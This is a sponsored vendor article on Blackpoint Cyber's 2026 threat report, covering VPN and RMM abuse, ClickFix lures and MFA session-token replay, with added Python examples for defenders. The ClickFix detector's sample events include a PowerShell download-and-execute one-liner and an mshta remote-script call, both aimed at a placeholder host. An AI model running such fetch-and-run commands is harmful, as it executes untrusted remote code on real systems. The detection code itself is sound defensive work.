
Common Access Methods Enable Modern Intrusions, New Threat Report Finds

Remote access and trusted management tools play a key role in how organizations operate today. According to Blackpoint Cyber’s 2026 Annual Threat Report, they are also increasingly the way intrusions start.

Informed by the analysis of thousands of security investigations conducted during the reporting period, the report highlights a change in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors typically gain access by using valid credentials, legitimate tools, and common user-driven actions.

The report examines these patterns, documents where intrusions were disrupted, and presents key protective measures derived from the incident response outcomes observed throughout 2025.

Additional data and best practices will be covered during an upcoming live webinar hosted by Blackpoint Cyber.

➡️ Register here

Key Findings from the 2026 Annual Threat Report

Attackers Get In Through Legitimate Access Methods

Across the incidents analyzed in the report, attackers were more likely to enter using legitimate access than by exploiting a vulnerability as their first point of entry.

SSL VPN abuse accounted for 32.8 percent of all identified incidents, making it one of the most common initial intrusion vectors. In many cases, malicious actors authenticated with valid but compromised credentials, producing VPN sessions that appeared legitimate to security controls.

Once access is established, these sessions often provide extensive internal access, allowing attackers to quickly move to high-value systems without immediately triggering alerts.

Reliable IT Tools Used Against Organizations

The report also highlights widespread abuse of legitimate Remote Monitoring and Management (RMM) tools as a means of access and persistence.

RMM abuse occurred in 30.3 percent of identified incidents, and ScreenConnect was present in more than 70 percent of malicious RMM cases. Because these tools are routinely used for IT management, unauthorized installations often resembled expected work and were difficult to distinguish without strong visibility.

The report notes that environments with multiple remote access tools in use are more likely to experience abuse of those tools.

Social Engineering, Not Exploitation, Drives Many Incidents

While legitimate access methods enabled many intrusions, user interaction represents a major driver of incident volume.

Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identified incidents, making them the most common attack pattern documented in the report.

Instead of exploiting software vulnerabilities, these campaigns rely on deception. Users are instructed to paste commands into the Windows Run dialog as part of what appears to be a verification step. The pasted commands use built-in Windows tools, so no conventional malware download or exploit is needed.
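As an added example (not from the report or Blackpoint's tooling), the rule below scores constructed process-creation events for the ClickFix pattern just described: a scripting interpreter spawned by explorer.exe, which is the parent of anything launched from the Run dialog, combined with a download, hidden-window or encoded-command indicator in the command line. Field names and the sample events are assumptions.

```python
import re
from dataclasses import dataclass

# Interpreters a ClickFix lure typically has the victim launch via Win+R.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# A command pasted into the Run dialog is spawned by explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
# Content indicators of a staged payload, keyed by the reason reported.
INDICATORS = {
    "remote download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"curl|bitsadmin)\b|https?://", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

@dataclass
class ProcEvent:          # minimal process-creation record (assumed schema)
    host: str
    parent_image: str
    image: str
    command_line: str

def clickfix_reasons(ev: ProcEvent) -> list:
    """Reasons an event looks like a ClickFix launch; empty list means no match.
    Requires BOTH the Run-dialog parent and at least one content indicator,
    so admin scripts started by services.exe or plain 'cmd /c dir' do not fire."""
    if ev.image.lower() not in INTERPRETERS or ev.parent_image.lower() != RUN_DIALOG_PARENT:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    return [f"{ev.image} spawned by {RUN_DIALOG_PARENT}"] + hits if hits else []

def detect(events) -> list:
    """Run the rule over a batch and return (host, reasons) for every match."""
    return [(ev.host, r) for ev in events if (r := clickfix_reasons(ev))]

# Constructed sample events; none come from a real investigation.
SAMPLE = [
    ProcEvent("ws01", "explorer.exe", "powershell.exe",
              'powershell -w hidden -c "iwr http://example.invalid/v.txt | iex"'),
    ProcEvent("ws02", "explorer.exe", "mshta.exe", "mshta https://example.invalid/verify.hta"),
    ProcEvent("ws03", "explorer.exe", "notepad.exe", "notepad.exe"),
    ProcEvent("srv01", "services.exe", "powershell.exe",
              "powershell -NoProfile -File C:\\Scripts\\backup.ps1"),
    ProcEvent("ws04", "explorer.exe", "cmd.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for host, reasons in detect(SAMPLE):
        print(host, "->", "; ".join(reasons))
```

In a real deployment the same rule would read Sysmon event 1 or EDR process telemetry, and the `RunMRU` registry key on the host corroborates that the command was typed into the Run dialog.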

Cloud Access Focuses on Session Reuse After MFA

Multi-factor authentication was enabled in most of the cloud environments associated with the investigated incidents; account compromises still occurred.

Adversary-in-the-Middle phishing accounted for nearly 16 percent of the cloud account compromises documented in the report. In these cases, MFA worked as designed. Instead of bypassing authentication, attackers captured the authenticated session tokens issued after successful MFA and reused them to access cloud services.

From the cloud platform's point of view, this activity looks like an authorized session.
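Because the platform cannot tell a replayed token from the original by the token alone, one defensive answer is to bind each session to the context observed at the MFA sign-in and re-evaluate every later use against it. The following added example (not from the report or any vendor SDK) shows that check on constructed data; the record fields, the eight-hour age limit and the ASN values are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

@dataclass
class SessionBinding:
    """Context captured when the token was issued right after a successful MFA."""
    user: str
    token_id: str
    issued_at: datetime
    device_id: str        # managed-device identifier attested at sign-in
    asn: int              # network the MFA sign-in came from
    user_agent: str

@dataclass
class TokenUse:
    """A later request presenting the same session token."""
    token_id: str
    seen_at: datetime
    device_id: Optional[str]  # None when no managed device attests the request
    asn: int
    user_agent: str

MAX_AGE = timedelta(hours=8)  # assumed policy: re-challenge after this

def reuse_risk(binding: SessionBinding, use: TokenUse) -> list:
    """Return risk reasons; an empty list means the use matches its binding."""
    if use.token_id != binding.token_id:
        raise ValueError("token does not belong to this binding")
    reasons = []
    if use.device_id != binding.device_id:
        reasons.append("device attestation differs from the MFA sign-in")
    if use.asn != binding.asn:
        reasons.append(f"network changed (ASN {binding.asn} -> {use.asn})")
    if use.user_agent != binding.user_agent:
        reasons.append("user agent differs from the MFA sign-in")
    if use.seen_at - binding.issued_at > MAX_AGE:
        reasons.append("token older than MAX_AGE; require fresh MFA")
    return reasons

def should_revoke(binding: SessionBinding, use: TokenUse) -> bool:
    """Policy: a device or network mismatch alone is enough to revoke and re-challenge."""
    return any(r.startswith(("device", "network")) for r in reuse_risk(binding, use))

# Constructed sample: a legitimate follow-up request and a replay from elsewhere.
T0 = datetime(2025, 6, 1, 9, 0)
BOUND = SessionBinding("alice@example.invalid", "tok-123", T0, "dev-corp-77", 64512, "Edge/125")
LEGIT = TokenUse("tok-123", T0 + timedelta(minutes=20), "dev-corp-77", 64512, "Edge/125")
REPLAYED = TokenUse("tok-123", T0 + timedelta(minutes=7), None, 64600, "Chrome/124")
```

The replayed use is caught seven minutes after a perfectly valid MFA, which is exactly the window the report describes.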

Many of the attacks described above begin with legitimate access. What happens next is where the real damage occurs.

In a recent investigation, our SOC identified a new malware family called Roadk1ll, which is designed to infiltrate systems over WebSocket-based connections and maintain access while blending in with normal network traffic.

Join Inside SOC Episode #002 to see how this attack progresses from initial access to compromise of the environment.

Save your seat

What These Findings Mean for Defense Teams

Across industries, geographies, and attack types, the report highlights a consistent pattern: most successful intrusions rely on activity that blends into routine operations.

Rather than relying on novel techniques or advanced malware, attackers exploited everyday workflows such as remote logins, trusted tools, and common user actions. Based on the attack chains analyzed, the report identifies several key defenses:

  • Treat remote access as a high-risk, high-impact activity
  • Maintain a complete inventory of authorized RMM tools and remove unused or legacy agents
  • Restrict unauthorized software installation and block execution from user-writable directories
  • Implement conditional access controls that assess device posture, location, and time-based risk
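The second and third defenses above come down to reconciling what is actually installed against what is sanctioned. As an added example (not from the report), this audit takes a constructed software inventory and flags unauthorized agents, agents running from user-writable paths, agents not installed by a deployment account, stale agents, and hosts carrying more than one remote access tool. The authorized-tool set, account names, paths and the 90-day threshold are assumptions.

```python
from dataclasses import dataclass
from datetime import date, timedelta

@dataclass
class Agent:              # one installed remote access agent (assumed inventory schema)
    host: str
    tool: str
    install_path: str
    installed_by: str
    last_used: date

AUTHORIZED_TOOLS = {"ScreenConnect"}                 # the single sanctioned RMM (assumption)
DEPLOYMENT_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "corp\\svc-deploy"}
STALE_AFTER = timedelta(days=90)
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")

def audit(agents, today: date) -> dict:
    """Return {host: [findings]} for hosts that need attention; clean hosts are omitted."""
    per_host = {}
    for a in agents:
        per_host.setdefault(a.host, []).append(a)
    findings = {}
    for host, items in per_host.items():
        f = []
        if len(items) > 1:   # the report links multiple remote access tools to higher abuse
            f.append(f"{len(items)} RMM agents installed: " + ", ".join(sorted(i.tool for i in items)))
        for a in items:
            if a.tool not in AUTHORIZED_TOOLS:
                f.append(f"unauthorized tool {a.tool}")
            if a.install_path.lower().startswith(USER_WRITABLE):
                f.append(f"{a.tool} runs from user-writable path {a.install_path}")
            if a.installed_by not in DEPLOYMENT_ACCOUNTS:
                f.append(f"{a.tool} installed by {a.installed_by}, not a deployment account")
            idle = today - a.last_used
            if idle > STALE_AFTER:
                f.append(f"{a.tool} unused for {idle.days} days; remove legacy agent")
        if f:
            findings[host] = f
    return findings

# Constructed inventory; hosts, accounts and the second tool name are made up.
TODAY = date(2025, 12, 1)
SAMPLE_AGENTS = [
    Agent("ws-a", "ScreenConnect", "C:\\Program Files (x86)\\ScreenConnect Client\\", "NT AUTHORITY\\SYSTEM", date(2025, 11, 28)),
    Agent("ws-b", "ScreenConnect", "C:\\Program Files (x86)\\ScreenConnect Client\\", "NT AUTHORITY\\SYSTEM", date(2025, 11, 30)),
    Agent("ws-b", "UnapprovedRMM", "C:\\Users\\bob\\AppData\\Local\\UnapprovedRMM\\", "corp\\bob", date(2025, 11, 29)),
    Agent("ws-c", "ScreenConnect", "C:\\Program Files (x86)\\ScreenConnect Client\\", "corp\\svc-deploy", date(2025, 5, 1)),
]

if __name__ == "__main__":
    for host, items in audit(SAMPLE_AGENTS, TODAY).items():
        print(host, "->", "; ".join(items))
```

Note that ws-b's ScreenConnect instance is sanctioned and raises nothing on its own; the report's point is that an authorized tool still needs the inventory and visibility controls, because the same product was the one most often abused.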

These patterns have been documented across the most commonly targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.

For teams interested in exploring how these intrusion patterns unfold, Blackpoint Cyber will review key findings, case examples, and countermeasures from the 2026 Annual Threat Report during an upcoming live webinar.

➡️ Sign up to receive the 2026 Annual Threat Report

Sponsored and written by Blackpoint Cyber.
